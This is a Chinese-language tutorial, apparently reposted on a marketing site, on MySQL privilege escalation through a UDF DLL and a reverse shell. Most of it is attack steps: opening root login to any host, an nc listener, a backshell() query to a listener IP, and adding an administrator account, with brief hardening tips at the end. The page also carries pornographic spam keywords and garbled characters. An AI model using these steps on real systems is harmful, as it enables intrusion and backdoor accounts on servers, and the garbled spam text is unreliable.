日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
MySQL數(shù)據(jù)庫反彈端口連接提權

在滲透或者安全評估時,有可能遇到一些比較奇葩的環(huán)境,即使通過Mysql root賬號和密碼獲取了webshell,由于無法執(zhí)行命令。在一般的情況下,也就放棄了。但其實可以換一種思路,通過mysql查詢來直接提權,可以針對以下場景:

(1)通過網(wǎng)站無法獲取webshell

(2)Webshell無法執(zhí)行命令

(3)有phpmyadmin和root賬號,無法查詢或者無法獲取網(wǎng)站的真實路徑

注:本文是筆者撰寫的Mysql安全系列文章的第二篇。***篇為《關系型數(shù)據(jù)庫管理系統(tǒng)MySQL提權基礎》。

一、反彈端口連接提權的條件

1.訪問Mysql數(shù)據(jù)庫

獲取了數(shù)據(jù)庫root賬號和密碼或者相當于root權限的賬號和密碼,同時能夠執(zhí)行查詢命令。換句話說可以通過phpmyadmin連接、通過網(wǎng)站后臺的執(zhí)行數(shù)據(jù)庫命令或者“Navicat for MySQL”等客戶端軟件連接。

2.可導出文件udf.dll到系統(tǒng)目錄或者Mysql數(shù)據(jù)庫安裝目錄下的lib下的plugin目錄。如果有上傳條件,可以直接上傳udf.dll到對應目錄。Mysql5.1以下版本到c:\winnt\system32或者c:\windows\system32目錄,Mysql5.1以上版本到Mysql安裝目錄下的plugin 目錄,例如D:\ComsenzEXP\MySQL\lib\plugin。

3.授權mysql數(shù)據(jù)庫遠程用戶登錄

可以修改host為%,更新權限,然后通過Navicat for MySQL連接數(shù)據(jù)庫,直接打開命令提示窗口進行導出。

允許遠程用戶登錄訪問mysql的方法,需要手動增加可以遠程訪問數(shù)據(jù)庫的用戶。

方法一:本地登入mysql,更改 "mysql" 數(shù)據(jù)庫里的 "user" 表里的 "host" 項,將"localhost"改為"%"

 
 
 
 
    
  
  
  
  
  1. use mysql;
    2. 
  
  
  
  
  2. update user set host = '%' where user = 'root';
    3.

FLUSH PRIVILEGES ;

方法二:直接授權

從任何主機上使用root用戶,密碼:youpassword(你的root密碼)連接到mysql服務器:

 
 
 
 
    
  
  
  
  
  1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION; 
    2. 
  
  
  
  
  2. FLUSH PRIVILEGES;
    3.

二、具體實現(xiàn)方法

1.連接mysql服務器

(1)通過mysql客戶端工具可以直接連接

(2)通過phpmyadmin進行連接

(3)通過mysql.exe直接連接

2.執(zhí)行查詢命令

(1)網(wǎng)上提供的“\. c:\mysql.txt”命令會出錯,***通過phpmyadmin或者Navicat for MySQL等工具來進行查詢。修改mysql.txt中的***一行代碼“select backshell("YourIP",4444);”為自己反彈的IP和反彈監(jiān)聽的端口。

(2)本地開啟監(jiān)聽反彈的端口

nc.exe -vv -l -p 4444

(3)執(zhí)行mysql查詢,將mysql.txt文件內容復制到查詢中執(zhí)行。

成功后,你將獲得一個system權限的cmdshell。

3.添加用戶或者獲取管理員密碼

通過反彈shell添加用戶antian365,密碼www.antian365.com

 
 
 
 
    
  
  
  
  
  1. net user antian365 www.antian365.com /add 
    2. 
  
  
  
  
  2. net localgroup administrators antian365
    3.

三、一個提權實例

1.在反彈監(jiān)聽服務器上進行端口監(jiān)聽

通過cmd命令提示符,執(zhí)行nc監(jiān)聽命令:nc –vv –l –p 4444,表示在本地監(jiān)聽4444端口。如果是在公網(wǎng)上,這反彈監(jiān)聽服務器必須有獨立IP,如果是內部網(wǎng)絡,則可以直接使用內網(wǎng)IP,如圖1所示。

圖1進行監(jiān)聽

2.修改mysql.txt文件中反彈地址

在mysql.txt文件中將***一行代碼修改為前面設置的監(jiān)聽IP地址和端口,如圖2所示,例如代碼:

select backshell("192.168.40.135",4444);//反彈監(jiān)聽服務器IP192.168.40.135,端口4444

圖2修改查詢代碼中反彈shell地址和端口

這個也可以再次單獨查詢:select backshell("192.168.40.135",4444);

3.執(zhí)行查詢

可以通過mysql命令行下執(zhí)行,也可以通過phpmyadmin查詢窗口以及一些mysql客戶端查詢進行,如圖3所示執(zhí)行查詢。

圖3執(zhí)行mysql查詢

說明:

(1)如果已經存在ghost表和backshell函數(shù),可以執(zhí)行以下命令進行刪除:

 
 
 
 
    
  
  
  
  
  1. drop table ghost; 
    2. 
  
  
  
  
  2. drop FUNCTION backshell;
    3.

(2)如果已經存在udf.dll,則可以跳過導出命令,執(zhí)行:

 
 
 
 
    
  
  
  
  
  1. CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
    2.

3.查看反彈結果

如圖4所示,顯示通過連接mysql執(zhí)行查詢獲取的終端反彈shell,在該shell下可以直接執(zhí)行net user、whoami等命令查看當前權限。

圖4查看反彈結果

四、防范方法

1.查看mysql數(shù)據(jù)庫中user表授權的登錄host,禁止具備Root賬號權限的用戶通過“%”進行登錄。

2.禁止在網(wǎng)站CMS系統(tǒng)使用root賬號進行配置。

3.設置root賬號的密碼為強密碼。

4.對Mysql執(zhí)行程序進行降權,禁止網(wǎng)站用戶讀取user.frm、user.myd、user.myi。例如D:\ComsenzEXP\MySQL\data\mysql下的user表文件user.frm、user.myd、user.myi要禁止網(wǎng)站用戶讀取和下載。

5.檢查mysql數(shù)據(jù)庫下的mysql表中是否存在其它無關表,檢查func表中的內容。

6.可以在相應的目錄下建立一個udf.dll空文件,并嚴格設置權限,任何人無讀取和寫入權限。

注:本文是筆者撰寫的Mysql安全系列文章的第二篇,我們將會持續(xù)推出后續(xù)文章,敬請期待。

【原創(chuàng)稿件,合作站點轉載請注明原文作者和出處為.com】


分享題目:MySQL數(shù)據(jù)庫反彈端口連接提權
網(wǎng)頁地址:http://www.dlmjj.cn/article/djedeoc.html